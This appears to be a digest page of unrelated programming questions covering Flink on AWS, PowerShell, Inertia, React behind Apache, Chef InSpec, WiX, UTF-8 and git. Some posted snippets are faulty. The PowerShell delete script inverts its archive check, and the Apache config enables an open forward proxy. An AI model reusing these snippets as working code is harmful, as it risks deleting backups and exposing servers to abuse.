Can you help me solve this out? Thanks a lot.

Windowing is not triggered when we deployed the Flink application into Kinesis Data Analytics

Posted: 17 May 2021 07:49 AM PDT

We have an Apache Flink POC application which works fine locally but after we deploy into Kinesis Data Analytics (KDA) it does not emit records into the sink.

Used technologies

Local

  • Source: Kafka 2.7
    • 1 broker
    • 1 topic with partition of 1 and replication factor 1
  • Processing: Flink 1.12.1
  • Sink: Managed ElasticSearch Service 7.9.1 (the same instance as in case of AWS)

AWS

  • Source: Amazon MSK Kafka 2.8
    • 3 brokers (but we are connecting to one)
    • 1 topic with partition of 1, replication factor 3
  • Processing: Amazon KDA Flink 1.11.1
    • Parallelism: 2
    • Parallelism per KPU: 2
  • Sink: Managed ElasticSearch Service 7.9.1

Application logic

  1. The FlinkKafkaConsumer reads messages in json format from the topic
  2. The jsons are mapped to domain objects, called Telemetry
private static DataStream<Telemetry> SetupKafkaSource(StreamExecutionEnvironment environment){
    Properties kafkaProperties = new Properties();
    kafkaProperties.setProperty(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, "BROKER1_ADDRESS.amazonaws.com:9092");
    kafkaProperties.setProperty(ConsumerConfig.GROUP_ID_CONFIG, "flink_consumer");

    FlinkKafkaConsumer<String> consumer = new FlinkKafkaConsumer<>("THE_TOPIC", new SimpleStringSchema(), kafkaProperties);

    consumer.setStartFromEarliest(); //Just for repeatable testing

    return environment
            .addSource(consumer)
            .map(new MapJsonToTelemetry());
}
  3. The Telemetry's timestamp is chosen for EventTimeStamp.
    3.1. With forMonotonousTimeStamps
  4. Telemetry's StateIso is used for keyBy.
    4.1. The two-letter ISO code of the state of the USA
  5. A 5-second tumbling window strategy is applied
private static SingleOutputStreamOperator<StateAggregatedTelemetry> SetupProcessing(DataStream<Telemetry> telemetries) {
    WatermarkStrategy<Telemetry> wmStrategy =
            WatermarkStrategy
                    .<Telemetry>forMonotonousTimestamps()
                    .withTimestampAssigner((event, timestamp) -> event.TimeStamp);

    return telemetries
            .assignTimestampsAndWatermarks(wmStrategy)
            .keyBy(t -> t.StateIso)
            .window(TumblingEventTimeWindows.of(Time.seconds(5)))
            .process(new WindowCountFunction());
}
  6. A custom ProcessWindowFunction is called to perform some basic aggregation.
    6.1. We calculate a single StateAggregatedTelemetry
  7. ElasticSearch is configured as the sink.
    7.1. StateAggregatedTelemetry data are mapped into a HashMap and pushed to the sink.
    7.2. All setBulkFlushXYZ methods are set to low values
private static void SetupElasticSearchSink(SingleOutputStreamOperator<StateAggregatedTelemetry> telemetries) {
    List<HttpHost> httpHosts = new ArrayList<>();
    httpHosts.add(HttpHost.create("https://ELKCLUSTER_ADDRESS.amazonaws.com:443"));

    ElasticsearchSink.Builder<StateAggregatedTelemetry> esSinkBuilder = new ElasticsearchSink.Builder<>(
            httpHosts,
            (ElasticsearchSinkFunction<StateAggregatedTelemetry>) (element, ctx, indexer) -> {
                Map<String, Object> record = new HashMap<>();

                record.put("stateIso", element.StateIso);
                record.put("healthy", element.Flawless);
                record.put("unhealthy", element.Faulty);
                ...

                LOG.info("Telemetry has been added to the buffer");
                indexer.add(Requests.indexRequest()
                        .index("INDEXPREFIX-"+ from.format(DateTimeFormatter.ofPattern("yyyy-MM-dd")))
                        .source(record, XContentType.JSON));
            }
    );

    //Using low values to make sure that the Flush will happen
    esSinkBuilder.setBulkFlushMaxActions(25);
    esSinkBuilder.setBulkFlushInterval(1000);
    esSinkBuilder.setBulkFlushMaxSizeMb(1);
    esSinkBuilder.setBulkFlushBackoff(true);
    esSinkBuilder.setRestClientFactory(restClientBuilder -> {});

    LOG.info("Sink has been attached to the DataStream");
    telemetries.addSink(esSinkBuilder.build());
}

Excluded things

  • We managed to put Kafka, KDA and ElasticSearch under the same VPC and same subnets to avoid the need to sign each request
  • From the logs we could see that the Flink can reach the ES cluster.
    Request
{
    "locationInformation": "org.apache.flink.streaming.connectors.elasticsearch7.Elasticsearch7ApiCallBridge.verifyClientConnection(Elasticsearch7ApiCallBridge.java:135)",
    "logger": "org.apache.flink.streaming.connectors.elasticsearch7.Elasticsearch7ApiCallBridge",
    "message": "Pinging Elasticsearch cluster via hosts [https://...es.amazonaws.com:443] ...",
    "threadName": "Window(TumblingEventTimeWindows(5000), EventTimeTrigger, WindowCountFunction) -> (Sink: Print to Std. Out, Sink: Unnamed, Sink: Print to Std. Out) (2/2)",
    "applicationARN": "arn:aws:kinesisanalytics:...",
    "applicationVersionId": "39",
    "messageSchemaVersion": "1",
    "messageType": "INFO"
}

Response

{
    "locationInformation": "org.elasticsearch.client.RequestLogger.logResponse(RequestLogger.java:59)",
    "logger": "org.elasticsearch.client.RestClient",
    "message": "request [HEAD https://...es.amazonaws.com:443/] returned [HTTP/1.1 200 OK]",
    "threadName": "Window(TumblingEventTimeWindows(5000), EventTimeTrigger, WindowCountFunction) -> (Sink: Print to Std. Out, Sink: Unnamed, Sink: Print to Std. Out) (2/2)",
    "applicationARN": "arn:aws:kinesisanalytics:...",
    "applicationVersionId": "39",
    "messageSchemaVersion": "1",
    "messageType": "DEBUG"
}
  • We could also verify that the messages had been read from the Kafka topic and sent for processing by looking at the Flink Dashboard (data is sent and received between tasks)

What we have tried without luck

  • We had implemented a RichParallelSourceFunction which emits 1_000_000 messages and then exits
    • This worked well in the Local environment
    • The job finished in the AWS environment, but there was no data on the sink side
  • We had implemented another RichParallelSourceFunction which emits 100 messages each second
    • Basically we had two loops: a while(true) outer and a for inner
    • After the inner loop we called Thread.sleep(1000)
    • This worked perfectly fine on the local environment
    • But in AWS we could see that checkpoints' size grow continuously and no message appeared in ELK
  • We have tried to run the KDA application with different parallelism settings
    • But there was no difference
  • We also tried to use different watermarking strategies (forBoundedOutOfOrderness, withIdle, noWatermarks)
    • But there was no difference
  • We have added logs for the ProcessWindowFunction and for the ElasticsearchSinkFunction
    • Whenever we ran the application from IDEA, these logs appeared on the console
    • Whenever we ran the application with KDA, there were no such logs in CloudWatch
      • The logs that were added to main do appear in the CloudWatch logs

We suppose that we don't see data on the sink side because the window-processing logic is not triggered. That's why we don't see processing logs in CloudWatch.

Any help would be more than welcome!


Update #1

  • We have tried to downgrade the Flink version from 1.12.1 to 1.11.1
    • There is no change
  • We have tried processing time window instead of event time
    • It did not even work on the local environment

Having trouble automating removing files using Powershell

Posted: 17 May 2021 07:49 AM PDT

The goal of my code is to automate removing files from the backup location. First, it needs to make sure that it is removing only files that are not from the current year. Then, it needs to make sure that the files exist in both the backup and archive directories before it can successfully remove them. I have marked where I believe the error is: where it checks whether the files exist in both locations. It keeps saying that it cannot bind an argument to parameter 'Path' because it is null.

<#Purpose of this program is to delete files from backup not from current Year that exists both in archive and backup#>
Function Delete-Files ($src, $dst)
{
    #if source folder or destination folder doesn't exist, break
    if (!(Test-Path $src))
    {
        "$src does not exist"
        break;
    }
    if (!(Test-Path $dst))
    {
        "$dst does not exist"
    }
    Set-Location $src
    #gets the files for the path the function is calling for
    Get-ChildItem $src |
    #where they were updated not this year
    Where-Object {$_.LastWriteTime.year -ne (Get-Date).year} |
    #checks to make sure that the files that are getting deleted exists in the archive
    Where-Object {!(Test-Path (Join-Path $dst $_.Name))} ###what I think is causing the error
    ForEach-Object {
    #code to delete files
        if ($files -ne $null) #if there are files to be deleted
        {
            "`nRemoving files"
            $null = Remove-Item $_.FullName $src
        }
        else                  #if there are not files to be deleted
        {
            "`nFiles do not exist"
        }
    }
}

#file location declared for $src
#file location declared for $dst
Delete-Files $src $dst

All Inertia requests must receive a valid Inertia response, however a plain JSON response was received

Posted: 17 May 2021 07:48 AM PDT

I am trying to understand and resolve this InertiaJS error without success; I hope I can get some help here.  valid Inertia response

React app showing page with "404 the requested path could not be found" when using Apache

Posted: 17 May 2021 07:48 AM PDT

I am deploying a React app to my Apache server.

I can access the app on my-ip:5001, but when I go to my domain it gives me "404 the requested path could not be found". By the way, the domain has been set up and worked with an HTML file before I started working with React.

enter image description here

I did npm run build and placed the build folder in the root of my server. Made no changes to the package.json file.

I run the server using: serve -s -l 5001

Apache conf file:

<IfModule mod_ssl.c>
<VirtualHost *:443>
        ServerName somedomain.com
        ServerAlias www.somedomain.com

ProxyRequests On
ProxyVia On
<Proxy *>
  Order deny,allow
  Allow from all
</Proxy>

        ProxyPass / http://localhost:5001/
        ProxyPassReverse / http://localhost:5001/

</VirtualHost>
</IfModule>

Any idea what might be going on here?

Possible to use Chef variables within Inspec?

Posted: 17 May 2021 07:49 AM PDT

I'm learning to write integration tests for my Chef cookbooks. Is it possible to reference variables from the attributes folder within my test?

Here's my test to make sure httpd and php are installed properly. However, I have additional packages I want to check for.

test/smoke/default/install.rb

%w(httpd php).each do |rpm_package|
  describe package(rpm_package) do
    it { should be_installed }
  end
end

attributes/default.rb

default['ic_apachephp']['php_packages'] = [
                              'php-mysqlnd',
                              'php-mbstring',
                              'php-gd',
                              'php-xml',
                              'php'
                            ]

How to disable Repair and option buttons on WiX toolset

Posted: 17 May 2021 07:49 AM PDT

There are plenty of questions regarding this issue, but none of them explain where exactly those two lines should be placed:

<Property Id="ARPNOREPAIR" Value="yes" Secure="yes" />
<Property Id="ARPNOMODIFY" Value="yes" Secure="yes" />

I tried searching online and in the documentation itself, but no luck.

EDIT

I tried putting them inside my tag but it's still there:

enter image description here

How to convert UTF8 string to byte array?

Posted: 17 May 2021 07:49 AM PDT

The .charCodeAt function returns the Unicode code of the character. But I would like to get the byte array instead. I know that if the char code is over 127, then the character is stored in two or more bytes.

var arr=[];
for(var i=0; i<str.length; i++) {
    arr.push(str.charCodeAt(i))
}
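As background for the multi-byte behaviour the question describes: a code point above 127 encodes to two or more bytes in UTF-8, so collecting per-character code points (as the loop above does) gives a different list than the actual byte array. The contrast is easy to see in Python, used here just for illustration since the question itself is JavaScript (in a browser, TextEncoder produces the UTF-8 bytes):

```python
# Compare Unicode code points (what charCodeAt-style indexing returns)
# with the UTF-8 byte sequence of the same string.
s = "héllo"
code_points = [ord(c) for c in s]
utf8_bytes = list(s.encode("utf-8"))

print(code_points)  # [104, 233, 108, 108, 111]       -- one entry per character
print(utf8_bytes)   # [104, 195, 169, 108, 108, 111]  -- 'é' became 0xC3 0xA9
```

The single code point 233 ('é', U+00E9) expands into the two-byte UTF-8 sequence 0xC3 0xA9, which is exactly the case the charCodeAt loop cannot capture.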

How to remove origin from git repository

Posted: 17 May 2021 07:49 AM PDT

Basic question: How do I disassociate a git repo from the origin from which it was cloned?

git branch -a shows:

* master
  remotes/origin/HEAD -> origin/master

and I want to remove all knowledge of origin, and the associated revisions.

Longer question: I want to take an existing subversion repo and make a number of smaller git repos from it. Each of the new git repos should have the full history of just the relevant branch. I can prune the repo to just the wanted subtree using:

git filter-branch --subdirectory-filter path/to/subtree HEAD  

but the resulting repo still contains all the revisions of the now-discarded subtrees under the origin/master branch.

I realise that I could use the -T flag to git-svn to clone the relevant subtree of the subversion repo in the first place. I'm not sure if that would be more efficient than later running multiple instantiations of git filter-branch --subdirectory-filter on copies of the git repo but, in any case, I would still like to break the link with the origin.
